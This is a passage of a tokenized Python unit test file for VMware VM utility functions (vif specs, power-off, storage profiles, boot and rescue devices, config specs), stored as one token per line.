op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'backing'
op|')'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'port'
op|')'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'portgroupKey'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvpg'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'switchUuid'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvsw'"
op|']'
newline|'\n'
name|'if'
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'.'
name|'get'
op|'('
string|"'dvs_port_key'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'portKey'
op|'='
op|'('
nl|'\n'
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvs_port_key'"
op|']'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'device'
op|'.'
name|'resourceAllocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
nl|'\n'
string|"'ns0:VirtualEthernetCardResourceAllocation'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'limit'
op|'='
number|'10'
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'reservation'
op|'='
number|'20'
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'share'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
nl|'\n'
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'share'
op|'.'
name|'level'
op|'='
string|"'custom'"
newline|'\n'
name|'device'
op|'.'
name|'resourceAllocation'
op|'.'
name|'share'
op|'.'
name|'shares'
op|'='
number|'40'
newline|'\n'
nl|'\n'
name|'connectable'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConnectInfo'"
op|')'
newline|'\n'
name|'connectable'
op|'.'
name|'allowGuestControl'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'connected'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'startConnected'
op|'='
name|'True'
newline|'\n'
name|'device'
op|'.'
name|'connectable'
op|'='
name|'connectable'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
name|'device'
newline|'\n'
name|'return'
name|'device_change'
newline|'\n'
nl|'\n'
DECL|member|test_get_create_vif_spec
dedent|''
name|'def'
name|'test_get_create_vif_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
op|'{'
string|"'network_name'"
op|':'
string|"'br100'"
op|','
nl|'\n'
string|"'mac_address'"
op|':'
string|"'00:00:00:ca:fe:01'"
op|','
nl|'\n'
string|"'network_ref'"
op|':'
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'fake-group'"
op|'}'
op|','
nl|'\n'
string|"'iface_id'"
op|':'
number|'7'
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'VirtualE1000'"
op|'}'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'self'
op|'.'
name|'_get_create_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|')'
newline|'\n'
name|'device_change'
op|'='
name|'self'
op|'.'
name|'_construct_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'device_change'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_create_vif_spec_dvs_port_key
dedent|''
name|'def'
name|'test_get_create_vif_spec_dvs_port_key'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
op|'{'
string|"'network_name'"
op|':'
string|"'br100'"
op|','
nl|'\n'
string|"'mac_address'"
op|':'
string|"'00:00:00:ca:fe:01'"
op|','
nl|'\n'
string|"'network_ref'"
op|':'
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'fake-group'"
op|','
nl|'\n'
string|"'dvs_port_key'"
op|':'
string|"'fake-key'"
op|'}'
op|','
nl|'\n'
string|"'iface_id'"
op|':'
number|'7'
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'VirtualE1000'"
op|'}'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'self'
op|'.'
name|'_get_create_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|')'
newline|'\n'
name|'device_change'
op|'='
name|'self'
op|'.'
name|'_construct_vif_spec'
op|'('
name|'fake_factory'
op|','
name|'vif_info'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'device_change'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_detach_config_spec
dedent|''
name|'def'
name|'test_get_network_detach_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_network_detach_config_spec'
op|'('
nl|'\n'
name|'fake_factory'
op|','
string|"'fake-device'"
op|','
number|'2'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
string|"'free'"
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.iface-id.2'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
string|"'fake-device'"
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'remove'"
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device_change'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|')'
newline|'\n'
DECL|member|test_power_off_instance
name|'def'
name|'test_power_off_instance'
op|'('
name|'self'
op|','
name|'fake_get_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_off_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOffVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'fake_get_ref'
op|'.'
name|'called'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|','
name|'return_value'
op|'='
string|'"fake-vm-ref"'
op|')'
newline|'\n'
DECL|member|test_power_off_instance_no_vm_ref
name|'def'
name|'test_power_off_instance_no_vm_ref'
op|'('
name|'self'
op|','
name|'fake_get_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_off_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'fake_get_ref'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOffVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|')'
newline|'\n'
DECL|member|test_power_off_instance_with_exception
name|'def'
name|'test_power_off_instance_with_exception'
op|'('
name|'self'
op|','
name|'fake_get_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'NovaException'
op|'('
string|"'fake'"
op|')'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NovaException'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'power_off_instance'
op|','
nl|'\n'
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOffVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'fake_get_ref'
op|'.'
name|'called'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|')'
newline|'\n'
DECL|member|test_power_off_instance_power_state_exception
name|'def'
name|'test_power_off_instance_power_state_exception'
op|'('
name|'self'
op|','
name|'fake_get_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
nl|'\n'
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'vexc'
op|'.'
name|'InvalidPowerStateException'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_off_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOffVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'fake_get_ref'
op|'.'
name|'called'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_updated_hw_version
dedent|''
dedent|''
name|'def'
name|'test_get_vm_create_spec_updated_hw_version'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'hw_version'
op|'='
string|"'vmx-08'"
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|'='
name|'extra_specs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'vmx-08'"
op|','
name|'result'
op|'.'
name|'version'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_vm_create_spec_with_profile_spec
dedent|''
name|'def'
name|'test_vm_create_spec_with_profile_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'datastore'
op|'='
name|'ds_obj'
op|'.'
name|'Datastore'
op|'('
string|"'fake-ds-ref'"
op|','
string|"'fake-ds-name'"
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'create_spec'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
name|'datastore'
op|'.'
name|'name'
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|','
nl|'\n'
name|'profile_spec'
op|'='
string|"'fake_profile_spec'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'fake_profile_spec'"
op|']'
op|','
name|'create_spec'
op|'.'
name|'vmProfile'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'pbm'
op|','
string|"'get_profile_id_by_name'"
op|')'
newline|'\n'
DECL|member|test_get_storage_profile_spec
name|'def'
name|'test_get_storage_profile_spec'
op|'('
name|'self'
op|','
name|'mock_retrieve_profile_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_profile_id'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'fake_profile_id'
op|'.'
name|'uniqueId'
op|'='
string|"'fake_unique_id'"
newline|'\n'
name|'mock_retrieve_profile_id'
op|'.'
name|'return_value'
op|'='
name|'fake_profile_id'
newline|'\n'
name|'profile_spec'
op|'='
name|'vm_util'
op|'.'
name|'get_storage_profile_spec'
op|'('
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
op|','
nl|'\n'
string|"'fake_policy'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'ns0:VirtualMachineDefinedProfileSpec'"
op|','
nl|'\n'
name|'profile_spec'
op|'.'
name|'obj_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'fake_profile_id'
op|'.'
name|'uniqueId'
op|','
name|'profile_spec'
op|'.'
name|'profileId'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'pbm'
op|','
string|"'get_profile_id_by_name'"
op|')'
newline|'\n'
DECL|member|test_storage_spec_empty_profile
name|'def'
name|'test_storage_spec_empty_profile'
op|'('
name|'self'
op|','
name|'mock_retrieve_profile_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_retrieve_profile_id'
op|'.'
name|'return_value'
op|'='
name|'None'
newline|'\n'
name|'profile_spec'
op|'='
name|'vm_util'
op|'.'
name|'get_storage_profile_spec'
op|'('
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
op|','
nl|'\n'
string|"'fake_policy'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'profile_spec'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_ephemeral_name
dedent|''
name|'def'
name|'test_get_ephemeral_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'filename'
op|'='
name|'vm_util'
op|'.'
name|'get_ephemeral_name'
op|'('
number|'0'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'ephemeral_0.vmdk'"
op|','
name|'filename'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_detach_and_delete_devices_config_spec
dedent|''
name|'def'
name|'test_detach_and_delete_devices_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_devices'
op|'='
op|'['
string|"'device1'"
op|','
string|"'device2'"
op|']'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'_detach_and_delete_devices_config_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'fake_devices'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'device1'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device1'
op|'.'
name|'device'
op|'='
string|"'device1'"
newline|'\n'
name|'device1'
op|'.'
name|'operation'
op|'='
string|"'remove'"
newline|'\n'
name|'device1'
op|'.'
name|'fileOperation'
op|'='
string|"'destroy'"
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device1'
op|')'
newline|'\n'
nl|'\n'
name|'device2'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device2'
op|'.'
name|'device'
op|'='
string|"'device2'"
newline|'\n'
name|'device2'
op|'.'
name|'operation'
op|'='
string|"'remove'"
newline|'\n'
name|'device2'
op|'.'
name|'fileOperation'
op|'='
string|"'destroy'"
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'reconfigure_vm'"
op|')'
newline|'\n'
DECL|member|test_detach_devices_from_vm
name|'def'
name|'test_detach_devices_from_vm'
op|'('
name|'self'
op|','
name|'mock_reconfigure'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_devices'
op|'='
op|'['
string|"'device1'"
op|','
string|"'device2'"
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'vm_util'
op|'.'
name|'detach_devices_from_vm'
op|'('
name|'session'
op|','
nl|'\n'
string|"'fake-ref'"
op|','
nl|'\n'
name|'fake_devices'
op|')'
newline|'\n'
name|'mock_reconfigure'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|','
string|"'fake-ref'"
op|','
name|'mock'
op|'.'
name|'ANY'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_boot_spec
dedent|''
name|'def'
name|'test_get_vm_boot_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'disk'
op|'.'
name|'key'
op|'='
number|'7'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_boot_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'disk'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'boot_disk'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
nl|'\n'
string|"'ns0:VirtualMachineBootOptionsBootableDiskDevice'"
op|')'
newline|'\n'
name|'boot_disk'
op|'.'
name|'deviceKey'
op|'='
name|'disk'
op|'.'
name|'key'
newline|'\n'
name|'boot_options'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineBootOptions'"
op|')'
newline|'\n'
name|'boot_options'
op|'.'
name|'bootOrder'
op|'='
op|'['
name|'boot_disk'
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'bootOptions'
op|'='
name|'boot_options'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_devices
dedent|''
name|'def'
name|'_get_devices'
op|'('
name|'self'
op|','
name|'filename'
op|')'
op|':'
newline|'\n'
indent|' '
name|'devices'
op|'='
name|'fake'
op|'.'
name|'_create_array_of_type'
op|'('
string|"'VirtualDevice'"
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'VirtualDevice'
op|'='
name|'self'
op|'.'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
nl|'\n'
name|'filename'
op|')'
newline|'\n'
name|'return'
name|'devices'
newline|'\n'
nl|'\n'
DECL|member|test_find_rescue_device
dedent|''
name|'def'
name|'test_find_rescue_device'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'filename'
op|'='
string|"'[test_datastore] uuid/uuid-rescue.vmdk'"
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_get_devices'
op|'('
name|'filename'
op|')'
newline|'\n'
name|'device'
op|'='
name|'vm_util'
op|'.'
name|'find_rescue_device'
op|'('
name|'devices'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'filename'
op|','
name|'device'
op|'.'
name|'backing'
op|'.'
name|'fileName'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_find_rescue_device_not_found
dedent|''
name|'def'
name|'test_find_rescue_device_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'filename'
op|'='
string|"'[test_datastore] uuid/uuid.vmdk'"
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_get_devices'
op|'('
name|'filename'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NotFound'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'find_rescue_device'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_validate_limits
dedent|''
name|'def'
name|'test_validate_limits'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'shares_level'
op|'='
string|"'high'"
op|','
nl|'\n'
name|'shares_share'
op|'='
number|'1948'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'InvalidInput'
op|','
nl|'\n'
name|'limits'
op|'.'
name|'validate'
op|')'
newline|'\n'
name|'limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'shares_level'
op|'='
string|"'fira'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'InvalidInput'
op|','
nl|'\n'
name|'limits'
op|'.'
name|'validate'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_console_delay
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_console_delay'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'console_delay_seconds'
op|'='
number|'2'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
